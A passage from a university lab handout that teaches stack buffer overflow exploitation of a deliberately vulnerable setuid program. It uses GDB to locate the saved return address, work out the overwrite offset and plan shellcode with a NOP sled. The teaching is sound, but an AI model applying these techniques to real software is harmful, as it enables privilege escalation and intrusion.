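Here 0x565562e0 (the address GDB reported for main) falls in the program's own text mapping, and the second address falls in [stack].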
For convenience, GDB also provides another way of getting the same
information. The GDB “info proc
” command extracts
information from the /proc
filesystem automatically in much
the same way we just did manually. Typing help info proc
tells you more about the command:
(gdb) help info proc
Show /proc process information about any running process.
Specify any process id, or use the program being debugged by default.
Specify any of the following keywords for detailed info:
mappings -- list of mapped memory regions.
stat -- list a bunch of random process info.
status -- list a different bunch of random process info.
all -- list all available /proc info.
And typing info proc mappings
should display output
similar to what we got from the
cat /proc/process_id/maps
command.
A good way to start is to open the vulnerable program in GDB, put a
breakpoint within the bof
function, and then run the
program. If we’re stopped somewhere in the bof
function,
then if we issue the backtrace
command, we can get some
basic information about the stack frames currently on the stack:
(gdb) backtrace
#0 bof (str=0xffffd2e3 "\n\212\027\377\367\bRUV\001") at stack.c:17
#1 0x565563ee in dummy_function (str=0xffffd2e3 "\n\212\027\377\367\bRUV\001") at stack.c:46
#2 0x56556382 in main (argc=1, argv=0xffffd5a4) at stack.c:34
(If you see something very different – make sure you’re running GDB
against stack-L1-dbg
, and not stack-L1
. The
latter program is missing the debug symbols that have been inserted into
stack-L1-dbg
, and thus will be less easy to analyse using
GDB.)
This says there are 3 stack frames on the stack. Stack frame #2
represents our position in the main
function. We’ve just
executed an instruction sitting at location 0x56556382
in
memory,5 which corresponds to
stack.c
line 34 (i.e., the call to
dummy_function(str)
).
Similarly, stack frame #1 represents our position in
dummy_function
, and stack frame #0 is the current stack
frame.
We can get more information about a stack frame using the
info frame
command. For instance, issuing the GDB command
info frame 0
should result in output like the
following:
(gdb) info frame 0
Stack frame at 0xffffcec0:
eip = 0x565562c2 in bof (stack.c:17); saved eip = 0x565563ee
called by frame at 0xffffd2d0
source language c.
Arglist at 0xffffce3c, args: str=0xffffd2e3 "\n\212\027\377\367\bRUV\001"
Locals at 0xffffce3c, Previous frame's sp is 0xffffcec0
Saved registers:
ebx at 0xffffceb4, ebp at 0xffffceb8, eip at 0xffffcebc
This tells us:
Looking at the first line of output,
Stack frame at 0xffffcec0
:
The current stack frame, for bof
, is at location
0xffffcec0
. (The stack frames for
dummy_function
and main
, if we inspect them,
will be at higher addresses in memory. Recall that the stack grows from
high memory addresses to low ones.)
Looking at the second line of output,
eip = 0x565562c2 in bof (stack.c:17); saved eip = 0x565563ee
:
This tells us about the value of the eip
register. On
Intel processors, this is the “Extended Instruction Pointer” register –
it keeps track of what instruction is currently being executed.
eip = 0x565562c2 in bof (stack.c:17)
tells us that we’re
currently executing the instruction at location 0x565562c2
in memory, and that it corresponds to stack.c
line 17.
saved eip = 0x565563ee
tells us about the bit of the
stack frame that says what code to execute after the current function
returns. Presently, the stack frame is going to return to location
0x565563ee
– the spot in dummy_function
where
we’ve just executed the call to bof()
.
Looking at the last line of output,
eip at 0xffffcebc
:
This tells us the location we need to overwrite, if we want to jump
to somewhere other than dummy_function
.
Memory location 0xffffcebc
is the part of the current
stack frame which stores the “next instruction to execute” after
bof
returns.
Let’s examine the Instruction Pointer a little. Make sure you’re
stopped in the middle of the bof
function: issue the GDB
commands run
(this will ask you if you want to restart the
program; answer yes) and next
to get there.
Issue the GDB command print $eip
to show the current
value of the Instruction Pointer, and you should see something like the
following:
(gdb) print $eip
$8 = (void (*)()) 0x565562c2 <bof+21>
What does this mean?
(void (*)()) says that we should think of the eip register as holding a pointer to a function taking no arguments and returning void.
0x565562c2 is the address in memory of the instruction currently being executed.
<bof+21> says that this address is 21 bytes past the start of bof. (If you like, you can confirm this by issuing the GDB command print bof, which will tell you where the first instruction in bof is located, and checking that it’s equal to address_in_eip − 21.)
Now let’s do the same for the saved eip.
Sometimes while debugging in GDB, it’s handy to be able to hang onto some value because it will be useful to refer to it in a later step.
GDB lets us define convenience variables (see the GDB documentation on convenience variables for details). These variables aren’t part of the program being debugged; they exist purely within GDB, and have no effect on the execution of the program. They’re more like a piece of GDB-specific “scratch paper” on which you might write down notes for later.
Convenience variables start with a dollar sign (“$
”).
You can set a convenience variable with a command like:
(gdb) set $myvar = 0x2020
and thereafter use the variable in any GDB command. For instance, the
following will print the value of $myvar
:
(gdb) print/x $myvar
$9 = 0x2020
(The “/x
” after the “print” command instructs GDB to
print the result in hexadecimal notation, rather than decimal, and is
useful for printing the value of pointers.)
We know the saved eip
is stored in memory location
0xffffcebc
. Let’s see where that currently points.
We’ll use GDB’s “convenience variables” to make our commands a bit
easier to read.
(gdb) set $saved_eip = 0xffffcebc
# ^ store the location for later
(gdb) print (size_t *) $saved_eip
# ^ we can tell GDB to treat $saved_eip as a size_t* (a pointer to size_t)
$10 = (size_t *) 0xffffcebc
(gdb) print/x (* ((size_t *) $saved_eip))
# ^ now we *dereference* the $saved_eip location,
# displaying (in hex) the address it holds.
$11 = 0x565563ee
We know it’s okay to treat $saved_eip
as a “pointer to
size_t
”, because a size_t
is big enough to
hold any address in memory.6 GDB tells us that the
current contents of $saved_eip
is 0x565563ee
–
and that is indeed the address GDB has said we’re going to jump back
to.
We can issue the command print (void (*)()) 0x565563ee
to confirm where that address is – GDB will tell us that it’s the same
as <dummy_function+62>
. (We cast it to the type
“pointer to a function taking no arguments and returning
void
”, so that GDB knows to interpret it as the address of
executable code.)
So, we’ve confirmed that the saved eip value does say that once the current function has finished executing, we’re to jump back into somewhere in dummy_function (specifically, 62 bytes after the start of the function).
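The <symbol+offset> notation GDB prints is plain address arithmetic: the number after the “+” is a byte offset from the function’s first instruction. As a minimal sketch, using the example addresses from the GDB session above (yours may differ), the start of each function can be recovered like this:

```python
# Addresses taken from the example GDB session above; yours may differ.
current_eip = 0x565562c2   # reported by GDB as <bof+21>
saved_eip = 0x565563ee     # reported by GDB as <dummy_function+62>

# The number after "+" is a byte offset from the start of the function.
bof_start = current_eip - 21
dummy_function_start = saved_eip - 62

print(f"bof starts at            {bof_start:#x}")
print(f"dummy_function starts at {dummy_function_start:#x}")
```

The two results should match what the GDB commands print bof and print dummy_function report.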
So, how can we overwrite the saved eip? We’ll need to know:
(a) where the buffer[BUF_SIZE] local variable is sitting in memory. This is where the contents of badfile will get written.
(b) where the saved eip is. If we adjust the contents of badfile carefully, we should be able to overwrite the saved eip with the address of some other function.
We can get item (a) by issuing the command print &buffer. The output should be something like:
(gdb) print &buffer
$12 = (char (*)[100]) 0xffffce4c
So the address of the saved eip
, minus the address of
buffer
, tells us the spot in badfile
that
should contain the address of our malicious shellcode.
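As a worked example of that subtraction, here is a short sketch using the addresses from the example GDB output above. The variable names are illustrative only, and the addresses on your machine will probably differ:

```python
# Example values from the GDB session above; substitute your own.
buffer_addr = 0xffffce4c      # from "print &buffer"
saved_eip_addr = 0xffffcebc   # from "info frame 0" ("eip at ...")

# Distance in bytes from the start of buffer to the saved eip.
offset = saved_eip_addr - buffer_addr
print(offset)  # 112
```

With these example values, bytes 112 to 115 of badfile are the ones that end up on top of the saved eip.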
To start with, you might want to focus on overwriting the saved
eip
with a function of your choosing and get that working,
before trying to force execution of your shellcode.
For instance, can you overwrite the saved eip so that when the bof function finishes, execution will, instead of returning to <dummy_function+62>, jump to the start of bof again, or the start of dummy_function?
In exploit.py
, change the value of ret
to the
location of the function you want to jump to, and change
offset
to the distance between buffer
and the
saved eip
. You can then use GDB to step through execution
of stack-L1-dbg
and confirm whether this worked.
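The following is a minimal sketch of the idea, not the lab’s actual exploit.py (whose layout may differ). The helper name build_badfile is hypothetical, the 517-byte file length is an assumption, and the ret and offset values are the ones from the example GDB session above. Since the data is copied with strcpy, which stops at the first zero byte, the sketch also checks that nothing before the end of the address is 0x00.

```python
def build_badfile(ret: int, offset: int, size: int = 517) -> bytes:
    """Return `size` filler bytes with the 4-byte address `ret` at `offset`.

    `size` defaults to 517, an assumed badfile length; adjust as needed.
    """
    content = bytearray(b"A" * size)   # distinctive filler, easy to spot in GDB
    # x86 is little-endian: the least significant byte is stored first.
    content[offset:offset + 4] = ret.to_bytes(4, byteorder="little")
    # strcpy stops at the first zero byte, so none may appear up to here.
    assert 0 not in content[:offset + 4]
    return bytes(content)


# Example values from the GDB session above (they may differ on your machine):
# 0x565562ad is the start of bof, and 112 is the buffer-to-saved-eip distance.
payload = build_badfile(ret=0x565562ad, offset=112)
print(payload[112:116].hex())  # ad625556
```

Writing payload to badfile in binary mode and then stepping through stack-L1-dbg in GDB should show the saved eip changing once strcpy has run.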
Then, try to get your shellcode executed. In exploit.py
,
change the value of shellcode
so that it holds the
shellcode instructions to execute. You’ll then need to decide where in
buffer
your shellcode should be inserted (leaving it at 0
to start with is fine); work out what the start address of your
shellcode is going to be; and ensure that ret
contains that
address.
Sample solutions
By working through section 3.3, it should be
possible to work out how the bof
stack frame is laid out in
memory for the stack-L1-dbg
program.
When bof
is executing, the stack frames in
stack-L1-dbg
look like this:
When the bof function is called:
1. The caller (dummy_function) pushes the argument to bof() (namely, str) onto the stack.
2. The caller executes a call instruction to invoke bof(). The address of the instruction after the call instruction is pushed onto the stack; this is the “saved eip”.
3. The current value of the ebp register is pushed onto the stack; this is the “saved ebp” value, and marks the start of a stack frame.
4. Space is reserved on the stack for local data (including buffer), from addresses ebp-108 to ebp-4.
So we need to overwrite address ebp+4 (the saved eip), and store in it the address of our shellcode.
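To make the layout concrete, here is a small sketch that rebuilds the key addresses of the bof frame from the value of ebp and cross-checks them against the example GDB output from earlier. It assumes the usual 32-bit calling convention (first argument at ebp+8) and the example addresses; yours may differ.

```python
# ebp once bof's prologue has run; it equals the address at which
# "info frame 0" reports the saved ebp in the example session.
ebp = 0xffffceb8

frame = {
    "str argument": ebp + 8,   # pushed by the caller before the call (assumed cdecl)
    "saved eip": ebp + 4,      # pushed by the call instruction
    "saved ebp": ebp,          # pushed at the start of bof
    "buffer": ebp - 108,       # start of the local buffer
}

# Print from high addresses to low, the way the stack is usually drawn.
for name, addr in sorted(frame.items(), key=lambda item: item[1], reverse=True):
    print(f"{addr:#x}  {name}")

# Cross-check against what GDB reported in the example session.
assert frame["saved eip"] == 0xffffcebc   # "eip at 0xffffcebc"
assert frame["buffer"] == 0xffffce4c      # "print &buffer"
```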
When we are working with the non-debug version of the program,
stack-L1
, the addresses of the buffer and saved registers
will be slightly different. But it’s still possible to work them out;
there are several ways.
Since we have access to the source code of the setuid version (it’s the same as the source code for the -dbg version), and since, with ASLR disabled, functions and variables should end up at exactly the same addresses each time, we can make a copy of the code and add “printf” calls to print out things like the location of the str argument to bof (near the high-memory end of the stack frame) and the location of buffer.
For instance, we can add the following code to bof:
printf("&buffer: %p\n", (void *) &buffer);
printf("&str: %p\n", (void *) &str);
and from those, work out where the saved eip
must
be.
Even though stack-L1
has no debugging information
added to it, you can actually still run GDB on it. Run the
following commands:
(gdb) layout asm # switch to displaying assembly, since there's no C source
(gdb) break bof # set a breakpoint at bof
(gdb) run # run til the breakpoint
and you’ll stop at the start of bof. You can still run the backtrace and info frame 0 commands to find out where the saved return address is and what the frame “base” address is (the ebp register). But you can no longer run (for example) info locals, since information about the C variable names and their types has been lost.
But, knowing that variable names are lost and that the assembly code uses “offsets from the ebp register” instead of variables, you might guess that just before the call to
strcpy
, the assembly code must include the offset to
buffer
. And indeed this is the case: the assembly preserves
a pretty readable call to strcpy
(“call 0x56556130 <strcpy@plt>
”), and a few
instructions beforehand is the exact offset from ebp
to
buffer
.
(If the executable has been stripped using the strip program, though, then even the names of functions like bof get removed, and it’s no longer possible to run break bof. It is possible to work with GDB on stripped binaries, but it can be a bit of a pain; a blogger on medium.com gives some tips in the post “Working With Stripped Binaries in GDB”. Fortunately, in this lab we are working only with unstripped binaries.)
It can be discovered through research (though we didn’t cover it in class) that there is a GCC-specific feature that allows us to print the contents of the ebp register.
The following code will do so:
register size_t my_ebp_var asm("ebp");
printf("ebp: %zx\n", my_ebp_var);
We can insert that code into the bof function in a copy of the source code for stack-L1 and
compile it. Since we know the “saved eip
” location is
$ebp + 4
, we know now what location we have to overwrite in
order to jump to our shellcode.
Some additional hints:
It can be useful to experiment with a badfile
where
the contents are very distinctive, and easy to spot in GDB’s output.
For instance, a badfile that starts with the letters
“ABCDEFGHIJKLMNOPQRSTUVWXYZ
”, say.
Likewise, before trying the exploit with real shellcode, you could try using a distinctive byte sequence (like "\x10\x11\x12\x13\x14\x15\x16\x17\x1a") so it’s easy to spot where in the buffer variable it’s located.
To print out the contents of a string in memory, you can use the
GDB command x/s some_ptr
.
(For other formats you can use, see the GDB “x command” reference.)
The x86 assembly instruction “NOP” (“No Operation”, code 0x90) does nothing; it’s like a semicolon in C, or the “pass” statement in Python. So if you put your shellcode sequence towards the end of badfile and fill the bytes before it with NOP instructions, it won’t matter if the location you jump to is a bit before the start of the shellcode: the NOP instructions will just get executed until the start of the shellcode is reached.
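The sketch below illustrates that layout under stated assumptions: a 517-byte badfile, the example offset (112) and buffer address from the GDB session above, and eight placeholder bytes standing in for the shellcode (they are not real shellcode). It shows the range of return addresses that would land somewhere in the run of NOPs.

```python
NOP = 0x90
SIZE = 517                  # assumed badfile length
OFFSET = 112                # buffer -> saved eip distance (example session)
BUFFER_ADDR = 0xffffce4c    # example address of buffer; differs outside GDB

placeholder = b"\xcc" * 8   # stand-in bytes only, NOT real shellcode

# Fill everything with NOPs, then put the payload at the very end.
content = bytearray([NOP] * SIZE)
start = SIZE - len(placeholder)
content[start:] = placeholder

# Once copied into buffer, every address from just past the saved eip
# up to the byte before the payload holds a NOP.
sled_first = BUFFER_ADDR + OFFSET + 4
sled_last = BUFFER_ADDR + start - 1

# Aim for the middle of that range to leave a margin in both directions.
ret = (sled_first + sled_last) // 2
ret_bytes = ret.to_bytes(4, byteorder="little")
assert 0 not in ret_bytes   # strcpy would stop copying at a zero byte
content[OFFSET:OFFSET + 4] = ret_bytes

print(f"sled covers {sled_first:#x} .. {sled_last:#x}; jumping to {ret:#x}")
```

Aiming for the middle of the range is one possible choice; any address in the range would do, as long as it contains no zero byte.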
The objdump
program can be used to
disassemble the stack-L1
and
stack-L1-dbg
binaries.
For the -dbg
version of the vulnerable program, we can
see the assembler code intermingled with C source code by running:
$ objdump --line-numbers -d --source ./stack-L1-dbg
If you’re at all familiar with assembly code, the bof
function is very small and simple and isn’t too hard to follow.
The code for the programs in this lab is adapted from the Set-UID lab at https://web.ecs.syr.edu/~wedu/seed/Labs/Set-UID/Set-UID.pdf and is copyright Wenliang Du, Syracuse University.
Also called assembly, assembler language, assembler or symbolic machine code.↩︎
A small, named memory cell used by the processor. See “Registers and the stack”.↩︎
You can replicate this by saving the assembly code as a
file sploit.s
, and inserting the lines:
section .text
global _start
_start:
at the start. Compile it with the command
nasm -f elf32 sploit.s -o sploit.o
, then issue the
command objdump -d sploit.o
to see the disassembled
shellcode.↩︎
The man page for proc explains the format of
the listing – search within the man page for the text
“/proc/[pid]/maps
” to locate the relevant documentation.
Most of the permissions (“r”, “w” and “x”) should be self-explanatory. For our purposes, you don’t need to know what the “p” means. (But if you’re interested: it indicates a private, copy-on-write memory segment.)↩︎
A little math tells us that (location_in_main − start_of_main) = (0x56556382 − 0x565562e0) = 162; we’re 162 bytes past the start of the main function. If we wanted, we could view the precise assembly language instructions being executed, by issuing the GDB command layout asm.↩︎
Technically, it would be more appropriate to treat
$saved_eip
as a “pointer to intptr_t
” or as a
“pointer to a function pointer” – but “size_t
” is much
easier to read.↩︎